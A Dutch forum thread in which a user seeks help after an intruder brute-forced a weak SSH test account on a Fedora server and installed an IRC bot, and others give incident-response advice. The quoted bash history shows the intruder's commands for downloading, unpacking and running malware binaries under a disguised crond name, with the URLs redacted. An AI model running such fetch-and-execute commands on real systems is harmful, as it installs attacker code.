Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien

[FC6] rare bash history (gehacked?)

Pagina: 1
Acties:
  • 372 views sinds 30-01-2008
  • Reageer

  • ymoona
  • Registratie: Januari 2004
  • Laatst online: 09:17
Hi,

Ik ben de laatste tijd weer wat aan het spelen met mijn linux server met daarop FC6.
Nu had een test gebruiker aangemaakt test/test om je raad het al het een en ander te testen.

Wil ik vanavond weer verder gaan, blijkt het wachtwoord verandert te zijn, ik inloggen als root. En daarna het password verandert (weer in test) en daarna even in history gekeken. Tot mijn schrik zag ik daar het volgende in. (gelijk het pwd moeilijker gemaakt)
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
uname -a
w
passwd
cd /var/tmp
cat /etc/issue
wget malware
tar xzvf 2.6.tgz
./2.6
rm -rf 2.6.tgz
rm -rf 2.6
wget malware
tar xzvf 2.tgz
./2
rm -rf 2.tgz
rm -rf 2
cd /var/tmp; wget nog meer malware; tar xzvf *.tgz; rm -rf *.tgz; cd .www; export PATH="."; crond
exit


de twee maal een tar die uitgepakt en uitgevoerd word. Het is geen script wat er uitgepakt maar een binarie. Plus dat ik de laatste regel niet helemaal snap. wat doet hij daar nou?

Aan beveiliging heb ik momenteel niets, geen SElinux of firewall. Ik zit achter een NAT.

Hoe kom ik er nu acher wat er mijn PC aan de hand is, want ik kan me niet voorstellen dat dit onschuldig is. en hoe maak ik het ongedaan?

een ps -aux geeft het volgende:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   2036   592 ?        Ss   Apr03   0:01 init [3]
root         2  0.0  0.0      0     0 ?        S    Apr03   0:00 [migration/0]
root         3  0.0  0.0      0     0 ?        SN   Apr03   0:00 [ksoftirqd/0]
root         4  0.0  0.0      0     0 ?        S    Apr03   0:00 [watchdog/0]
root         5  0.0  0.0      0     0 ?        S<   Apr03   0:00 [events/0]
root         6  0.0  0.0      0     0 ?        S<   Apr03   0:00 [khelper]
root         7  0.0  0.0      0     0 ?        S<   Apr03   0:00 [kthread]
root        51  0.0  0.0      0     0 ?        S<   Apr03   0:00 [kblockd/0]
root        52  0.0  0.0      0     0 ?        S<   Apr03   0:00 [kacpid]
root       128  0.0  0.0      0     0 ?        S<   Apr03   0:00 [cqueue/0]
root       129  0.0  0.0      0     0 ?        S<   Apr03   0:00 [ksuspend_usbd]
root       132  0.0  0.0      0     0 ?        S<   Apr03   0:00 [khubd]
root       134  0.0  0.0      0     0 ?        S<   Apr03   0:00 [kseriod]
root       152  0.0  0.0      0     0 ?        S    Apr03   0:13 [pdflush]
root       153  0.0  0.0      0     0 ?        S    Apr03   0:14 [pdflush]
root       154  0.0  0.0      0     0 ?        S<   Apr03   0:15 [kswapd0]
root       155  0.0  0.0      0     0 ?        S<   Apr03   0:00 [aio/0]
root       309  0.0  0.0      0     0 ?        S<   Apr03   0:00 [kpsmoused]
root       331  0.0  0.0      0     0 ?        S<   Apr03   0:00 [ata/0]
root       332  0.0  0.0      0     0 ?        S<   Apr03   0:00 [ata_aux]
root       335  0.0  0.0      0     0 ?        S<   Apr03   0:00 [scsi_eh_0]
root       336  0.0  0.0      0     0 ?        S<   Apr03   0:00 [scsi_eh_1]
root       341  0.0  0.0      0     0 ?        S<   Apr03   0:34 [kmirrord]
root       346  0.0  0.0      0     0 ?        S<   Apr03   0:00 [ksnapd]
root       347  0.0  0.0      0     0 ?        S<   Apr03   0:00 [kcopyd]
root       348  0.0  0.0      0     0 ?        S<   Apr03   0:36 [kjournald]
root       375  0.0  0.0      0     0 ?        S<   Apr03   0:00 [kauditd]
root       409  0.0  0.1   2212   608 ?        S<s  Apr03   0:01 /sbin/udevd -d
root       959  0.0  0.0      0     0 ?        S<   Apr03   0:00 [kgameportd]
root       961  0.0  0.0      0     0 ?        S<   Apr03   0:00 [ac97/0]
test      1204  0.0  0.2   1948   964 ?        Ss   03:04   0:00 crond
root      1371  0.0  0.0      0     0 ?        S<   Apr03   0:00 [kmpathd/0]
root      1432  0.0  0.0      0     0 ?        S<   Apr03   0:00 [kjournald]
root      1589  0.0  0.0   1624   284 ?        Ss   Apr03   0:01 cpuspeed -d -p
root      1933  0.0  0.1   2276   696 ?        Ss   Apr03   0:00 /sbin/dhclient
root      2061  0.0  0.1   1700   580 ?        Ss   Apr03   0:01 syslogd -m 0
root      2064  0.0  0.0   1640   400 ?        Ss   Apr03   0:00 klogd -x
rpc       2114  0.0  0.1   1776   532 ?        Ss   Apr03   0:00 portmap
root      2139  0.0  0.1   1892   800 ?        Ss   Apr03   0:00 rpc.statd
root      2181  0.0  0.1   4924   548 ?        Ss   Apr03   0:00 rpc.idmapd
dbus      2209  0.0  0.2   2712   904 ?        Ss   Apr03   0:00 dbus-daemon --s
root      2255  0.0  0.2  12696  1292 ?        Ssl  Apr03   0:02 pcscd
root      2289  0.0  0.0   1880   440 ?        Ss   Apr03   0:00 /usr/bin/hidd -
root      2312  0.0  0.2   6268  1108 ?        Ssl  Apr03   0:00 automount
root      2335  0.0  0.1   1644   548 ?        Ss   Apr03   0:00 /usr/sbin/acpid
root      2350  0.0  0.4   9592  2112 ?        Ss   Apr03   0:00 cupsd
root      2416  0.0  0.0   1872   356 ?        Ss   Apr03   0:00 gpm -m /dev/inp
root      2431  0.0  0.2   5228  1104 ?        Ss   Apr03   0:00 crond
xfs       2458  0.0  0.2   3264  1132 ?        Ss   Apr03   0:00 xfs -droppriv -
root      2506  0.0  0.0   2208   432 ?        Ss   Apr03   0:00 /usr/sbin/atd
avahi     2522  0.0  0.2   2548  1340 ?        Ss   Apr03   0:00 avahi-daemon: r
avahi     2523  0.0  0.0   2548   324 ?        Ss   Apr03   0:00 avahi-daemon: c
68        2538  0.0  0.7   5228  3520 ?        Ss   Apr03   0:05 hald
root      2539  0.0  0.2   2980   900 ?        S    Apr03   0:00 hald-runner
68        2545  0.0  0.1   1972   796 ?        S    Apr03   0:00 hald-addon-acpi
root      2546  0.0  0.1   3036   880 ?        S    Apr03   0:00 /usr/libexec/ha
68        2554  0.0  0.1   1972   792 ?        S    Apr03   0:00 hald-addon-keyb
68        2557  0.0  0.1   1972   792 ?        S    Apr03   0:00 hald-addon-keyb
68        2560  0.0  0.1   1968   788 ?        S    Apr03   0:00 hald-addon-keyb
root      2607  0.0  0.1   1952   504 ?        S    Apr03   0:00 /usr/sbin/smart
root      2613  0.0  0.0   1628   432 tty1     Ss+  Apr03   0:00 /sbin/mingetty
root      2614  0.0  0.0   1624   424 tty2     Ss+  Apr03   0:00 /sbin/mingetty
root      2615  0.0  0.0   1628   432 tty3     Ss+  Apr03   0:00 /sbin/mingetty
root      2616  0.0  0.0   1628   432 tty4     Ss+  Apr03   0:00 /sbin/mingetty
root      2617  0.0  0.0   1628   432 tty5     Ss+  Apr03   0:00 /sbin/mingetty
root      2618  0.0  0.0   1628   428 tty6     Ss+  Apr03   0:00 /sbin/mingetty
dovecot   3197  0.0  0.3   4364  1352 ?        S    15:55   0:01 imap-login
dovecot   3857  0.0  0.3   4368  1356 ?        S    21:11   0:00 imap-login
root      3861  0.0  0.5   8032  2420 ?        Ss   21:12   0:00 sshd: root@pts/
root      3863  0.0  0.3   4488  1384 pts/0    Ss+  21:12   0:00 -bash
postfix   3914  0.0  0.3   6312  1608 ?        S    21:20   0:00 pickup -l -t fi
dovecot   3925  0.0  0.3   4368  1356 ?        S    21:22   0:00 imap-login
root      4050  0.0  0.5   8032  2352 ?        Ss   21:29   0:00 sshd: test [pri
test      4052  0.0  0.3   8184  1440 ?        S    21:29   0:00 sshd: test@pts/
test      4053  0.0  0.3   4488  1408 pts/1    Ss+  21:29   0:00 -bash
root      4116  0.2  0.5   8028  2424 ?        Ss   21:42   0:02 sshd: root@pts/
root      4119  0.0  0.3   4488  1384 pts/2    Ss   21:42   0:00 -bash
root      4345  0.0  0.5  13360  2476 ?        Ss   21:52   0:00 smbd -D
root      4348  0.0  0.2   8748  1224 ?        Ss   21:52   0:00 nmbd -D
root      4350  0.0  0.2  13360  1196 ?        S    21:52   0:00 smbd -D
root      4360  0.0  0.2   4220   936 pts/2    R+   21:55   0:00 ps -aux
root      5351  0.0  0.2   4484  1192 ?        S    Apr04   0:00 /bin/sh /usr/bi
mysql     5387  0.0  4.6 127100 20956 ?        Sl   Apr04   8:39 /usr/libexec/my
root      6309  0.0  0.2   5180   944 ?        Ss   Apr04   0:00 /usr/sbin/sshd
root     28680  0.0  0.3   6244  1648 ?        Ss   Apr08   0:00 /usr/libexec/po
root     28784  0.0  1.9  26984  8952 ?        Ss   Apr08   0:00 /usr/sbin/httpd
apache   28786  0.0  3.0  35024 13580 ?        S    Apr08   0:02 /usr/sbin/httpd
apache   28787  0.0  3.6  37020 16208 ?        S    Apr08   0:03 /usr/sbin/httpd
apache   28788  0.0  2.4  32776 10996 ?        S    Apr08   0:01 /usr/sbin/httpd
apache   28789  0.0  3.5  36348 15736 ?        S    Apr08   0:03 /usr/sbin/httpd
apache   28790  0.0  3.2  35284 14648 ?        S    Apr08   0:03 /usr/sbin/httpd
apache   28791  0.0  3.2  35264 14564 ?        S    Apr08   0:03 /usr/sbin/httpd
apache   28792  0.0  3.7  36920 17016 ?        S    Apr08   0:06 /usr/sbin/httpd
apache   28793  0.0  3.7  37208 17072 ?        S    Apr08   0:03 /usr/sbin/httpd
root     28815  0.0  0.1   1836   488 ?        Ss   Apr08   0:11 /usr/sbin/dovec
root     28818  0.0  0.3   7128  1352 ?        S    Apr08   0:01 dovecot-auth
dovecot  28819  0.0  0.2   4356  1344 ?        S    Apr08   0:11 pop3-login
dovecot  28820  0.0  0.3   4360  1348 ?        S    Apr08   0:11 pop3-login
dovecot  28821  0.0  0.2   4356  1344 ?        S    Apr08   0:11 pop3-login
root     28893  0.0  0.1   4984   616 ?        Ss   Apr08   0:00 /usr/sbin/sasla
root     28894  0.0  0.0   4984   340 ?        S    Apr08   0:00 /usr/sbin/sasla
root     28896  0.0  0.0   4984   352 ?        S    Apr08   0:00 /usr/sbin/sasla
root     28897  0.0  0.0   4984   340 ?        S    Apr08   0:00 /usr/sbin/sasla
root     28898  0.0  0.0   4984   340 ?        S    Apr08   0:00 /usr/sbin/sasla
postfix  28918  0.0  0.3   6368  1728 ?        S    Apr08   0:00 qmgr -l -t fifo
apache   31672  0.0  2.4  32784 10984 ?        S    Apr09   0:00 /usr/sbin/httpd
apache   31681  0.0  2.4  33052 11232 ?        S    Apr09   0:00 /usr/sbin/httpd
apache   31682  0.0  2.2  32128 10164 ?        S    Apr09   0:00 /usr/sbin/httpd
apache   31683  0.0  2.2  32132 10132 ?        S    Apr09   0:00 /usr/sbin/httpd
apache   31684  0.0  2.5  33148 11268 ?        S    Apr09   0:01 /usr/sbin/httpd
apache   31685  0.0  2.2  32080 10208 ?        S    Apr09   0:00 /usr/sbin/httpd
apache   31686  0.0  2.1  31664  9612 ?        S    Apr09   0:00 /usr/sbin/httpd
apache   31687  0.0  2.2  32080 10192 ?        S    Apr09   0:00 /usr/sbin/httpd


nog wat gegevens:
Het ip waarvan het gebeurde is: 82.78.183.5
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
ping -a 82.78.183.5

Pingen naar 82-78-183-5.oradea.rdsnet.ro [82.78.183.5] met 32 byte gegevens:

Antwoord van 82.78.183.5: bytes=32 tijd=44 ms TTL=117
Antwoord van 82.78.183.5: bytes=32 tijd=41 ms TTL=117
Antwoord van 82.78.183.5: bytes=32 tijd=43 ms TTL=117
Antwoord van 82.78.183.5: bytes=32 tijd=41 ms TTL=117

Ping-statistieken voor 82.78.183.5:
    Pakketten: verzonden = 4, ontvangen = 4, verloren = 0
    (0% verlies).De gemiddelde tijd voor het uitvoeren van één bewerking in mill
iseconden:
    Minimum = 41ms, Maximum = 44ms, Gemiddelde = 42ms


Ik heb ook een tcp dump gedaan, maar daar lijkt alles redelijk rustig

[ Voor 94% gewijzigd door pasta op 11-04-2007 13:49 ]

https://f1nerd.nl


  • pasta
  • Registratie: September 2002
  • Laatst online: 12-01 14:16

pasta

Ondertitel

Controleer even wat er in /var/tmp/.www staat

Ik haal uit mijn beperkte bash-kennis (dat en aannames) namelijk uit dat hucker.tgz een hidden directory aanmaakt genaamd 'www'. Verder, draai je zelf apache?

Daarbij heb ik ook even naar de files gekeken (tevens maar verwijderd uit je post) die gedownload wordt. De 2e bevat een XDCC bot als ik het zo goed zag. ;)

offtopic:
In feite is het niet meer dan logisch dat je zelfs onder linux sowieso een firewall draait. ;)


edit:
Ik zou tevens ook even het volgende proces killen dat wordt gestart (volgens je log):

code:
1
test      1204  0.0  0.2   1948   964 ?        Ss   03:04   0:00 crond

[ Voor 16% gewijzigd door pasta op 11-04-2007 13:51 ]

Signature


  • DiedX
  • Registratie: December 2000
  • Laatst online: 30-11 12:12
ziet er uit alsof je gehackt, of wellicht geroot bent. Vooral die crond die als testuser draait wijst op het laatste.

NAT zegt hier niets bij: ze zijn binnengekomen via je HTTP, vermoedelijk een niet up-to-date versie van een Gallery, Mambo oid, en wrsch kan je opnieuw beginnen.

Welke kernel draaide je?

DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards


  • blaataaps
  • Registratie: Juli 2001
  • Niet online
Dat crond draait als user test is eerder een teken dat hij niet geroot is dan dat hij wel geroot is. En alvorens je die crond killt even kijken waar de executable staat (waarschijnlijk gewoon in /var/tmp/.www/ maar toch).

  • DiedX
  • Registratie: December 2000
  • Laatst online: 30-11 12:12
Tenzij hij die user test zelf heeft aangemaakt (of test:test, wat ook nog zou kunnen), deel ik die mening niet. Alleen root zou users op kunnen voeren.

DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards


  • blaataaps
  • Registratie: Juli 2001
  • Niet online
DiedX schreef op woensdag 11 april 2007 @ 15:46:
Tenzij hij die user test zelf heeft aangemaakt
Gelukkig geeft de user dat aan in de startpost.

  • u_nix_we_all
  • Registratie: Augustus 2002
  • Niet online
Check ook ff die processen van user "68", lijkt me niet zo fijn (processen van een user die niet meer bestaat ?)
Verder op rootkits checken, bijv met RKhunter

You don't need a parachute to go skydiving. You need a parachute to go skydiving twice.


  • DiedX
  • Registratie: December 2000
  • Laatst online: 30-11 12:12
blaataaps schreef op woensdag 11 april 2007 @ 16:15:
[...]
Gelukkig geeft de user dat aan in de startpost.
:X :X

Sorry, en bedankt!

DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards


  • blaataaps
  • Registratie: Juli 2001
  • Niet online
:)

  • ymoona
  • Registratie: Januari 2004
  • Laatst online: 09:17
@pasta
Ik draai idd apache, php en mysql (allen gekoppeld aan mijn sub domein)

@DiedX
Dit lijkt me een beetje voorbarig (en meer een win oplossing), ook het idee dat ze via http zijn binnen gekomen lijkt me gek, dit omdat het meer voor de handlicht dat ze via een test/test zijn binnen gekomen.

@u_nix_we_all
Deze processen vond ik ook wel gek, ik heb ze gekilled

Bedankt voor de reacties, ik heb vandaag zelf al twee rootkit detectors gedraait (chkroot en rkhunter) en rkhunter geeft toch wel een redelijk rare uitslag:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
Info: prelinked files found
  Performing 'known good' check...
   /bin/cat                                                   [ BAD ]
   /bin/chmod                                                 [ BAD ]
   /bin/chown                                                 [ BAD ]
   /bin/date                                                  [ BAD ]
   /bin/dmesg                                                 [ BAD ]
   /bin/env                                                   [ BAD ]
   /bin/grep                                                  [ BAD ]
   /bin/kill                                                  [ BAD ]
   /bin/login                                                 [ BAD ]
   /bin/ls                                                    [ BAD ]
   /bin/more                                                  [ BAD ]
   /bin/mount                                                 [ BAD ]
   /bin/netstat                                               [ OK ]
   /bin/ps                                                    [ BAD ]
   /bin/su                                                    [ BAD ]
   /sbin/chkconfig                                            [ OK ]
   /sbin/depmod                                               [ OK ]
   /sbin/ifconfig                                             [ OK ]
   /sbin/init                                                 [ OK ]
   /sbin/insmod                                               [ OK ]
   /sbin/ip                                                   [ BAD ]
   /sbin/lsmod                                                [ OK ]
   /sbin/modinfo                                              [ OK ]
   /sbin/modprobe                                             [ OK ]
   /sbin/rmmod                                                [ OK ]
   /sbin/runlevel                                             [ OK ]
   /sbin/sulogin                                              [ OK ]
   /sbin/sysctl                                               [ BAD ]
   /sbin/syslogd                                              [ BAD ]
   /usr/bin/chattr                                            [ BAD ]
   /usr/bin/du                                                [ BAD ]
   /usr/bin/file                                              [ BAD ]
   /usr/bin/find                                              [ OK ]
   /usr/bin/head                                              [ BAD ]
   /usr/bin/killall                                           [ BAD ]
   /usr/bin/lsattr                                            [ BAD ]
   /usr/bin/md5sum                                            [ BAD ]
   /usr/bin/passwd                                            [ OK ]
   /usr/bin/pstree                                            [ BAD ]
   /usr/bin/sha1sum                                           [ BAD ]
   /usr/bin/stat                                              [ BAD ]
   /usr/bin/strings                                           [ BAD ]
   /usr/bin/top                                               [ BAD ]
   /usr/bin/users                                             [ BAD ]
   /usr/bin/vmstat                                            [ BAD ]
   /usr/bin/w                                                 [ BAD ]
   /usr/bin/watch                                             [ BAD ]
   /usr/bin/wc                                                [ BAD ]
   /usr/bin/wget                                              [ BAD ]
   /usr/bin/whereis                                           [ BAD ]
   /usr/bin/who                                               [ BAD ]
   /usr/bin/whoami                                            [ BAD ]


oftewel de binaries lijken niet meer origineel te zijn, ware het niet dat 2 andere fc systemen exact de zelfde uitvoer geven, verder geen root kits gevonden.

Ik heb de proccessen gekilled van user 68 en ook van crond van user test.

de ls van /var/tmp/.www ziet er als volgd uit:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
1.user  
2.user  
3.user  
checkmech  
configure  
crond  
cutitas.seen  
dintisor.seen  
genuser  
http.tgz  
LinkEvents  
lucifer.seen  
Makefile  
m.help  
mkindex  
m.lev  
m.pid  
m.ses  
m.set  
pico  
pico.tgz  
r  
src

In een van de files vond ik deze tekst:
code:
1
EnergyMech, IRC Bot software

deze directory heb ik verwijdert.

verder heb ik nu wel een fire wall aangezet (via /usr/sbin/setup)
root toegang via ssh ontzegt en de test user verwijdert.
en op het andere user account een sterk passwordt gezet.

Moet/kan ik nog meer doen.

[ Voor 3% gewijzigd door ymoona op 11-04-2007 21:09 ]

https://f1nerd.nl


Verwijderd

He,
Tja, dit is idd waarschijnlijk een brute force op je ssh.. en test / test komop..dat hoef ik je niet uit te leggen.
Toch zou ik belangrijke data backuppen en ff new install doen.
En dan
SE linux aan
Firewall aan
SSH hoge poort - en root uit.
En voor alle andere poorten...je firewall configgen op IP.
Als je dan geen bank bent ben je volgens mij niet zo interessant meer. ;)

  • CyBeR
  • Registratie: September 2001
  • Niet online

CyBeR

💩

ymoona schreef op woensdag 11 april 2007 @ 20:50:

verder heb ik nu wel een fire wall aangezet (via /usr/sbin/setup)
root toegang via ssh ontzegt en de test user verwijdert.
en op het andere user account een sterk passwordt gezet.

Moet/kan ik nog meer doen.
Gewoonlijk zou ik zeggen, doos reinstallen. Maar omdat je in deze situatie niet geroot bent maar de haxx0rer niet verder is gekomen dan een user account is dat niet strict noodzakelijk. Echter: omdat er in linux ook wel her-en-der lokaal exploitbare bugs zitten is 't wel een goed idee om dat toch nog te doen.


Die processen van nr. 68 had je mogen laten draaien, dat zijn gewoon legitieme daemons die met een hardware abstraction layer te maken hebben, en draaien onder een user wier naam te lang is voor ps's kolommenoutput. Te verifieren met 'getent passwd 68'

[ Voor 16% gewijzigd door CyBeR op 11-04-2007 21:42 ]

All my posts are provided as-is. They come with NO WARRANTY at all.


  • ymoona
  • Registratie: Januari 2004
  • Laatst online: 09:17
Verwijderd schreef op woensdag 11 april 2007 @ 21:33:
He,
Tja, dit is idd waarschijnlijk een brute force op je ssh.. en test / test komop..dat hoef ik je niet uit te leggen.
dat dacht ik ook
Toch zou ik belangrijke data backuppen en ff new install doen.
Nieuwe install heb ik eigenlijk niet zoveel zin in, het draait nu eindelijk goed.
En dan
SE linux aan
SE linux ken ik verders niet, maar het werkt wel (perongeluk een keertje aan gezet niet werkt meer)
Firewall aan
Dat heb ik al gedaan
SSH hoge poort - en root uit.
root is al uit, ik zal een kijken hoe ik de ssh poort verander.( maar dit blijft toch gewoon zichtbaar met een portscan?)
En voor alle andere poorten...je firewall configgen op IP.
Hoe bedoel je dit? Ik heb nu wel firewall aanstaan en aantal protocollen toegestaan (ssh http samba)
Als je dan geen bank bent ben je volgens mij niet zo interessant meer. ;)
vergensmij ben ik nooit intressant, kwa data dan, kwa vverbinding kan ik als spambot of wat dan ook best intressant zijn

https://f1nerd.nl


  • ymoona
  • Registratie: Januari 2004
  • Laatst online: 09:17
CyBeR schreef op woensdag 11 april 2007 @ 21:41:
[...]


Gewoonlijk zou ik zeggen, doos reinstallen. Maar omdat je in deze situatie niet geroot bent maar de haxx0rer niet verder is gekomen dan een user account is dat niet strict noodzakelijk. Echter: omdat er in linux ook wel her-en-der lokaal exploitbare bugs zitten is 't wel een goed idee om dat toch nog te doen.
Zucht...
ik ga me dan toch maar voor bereiden op een herinstall...
Die processen van nr. 68 had je mogen laten draaien, dat zijn gewoon legitieme daemons die met een hardware abstraction layer te maken hebben, en draaien onder een user wier naam te lang is voor ps's kolommenoutput. Te verifieren met 'getent passwd 68'
Dit werkt idd, weer wat geleerd

https://f1nerd.nl

Pagina: 1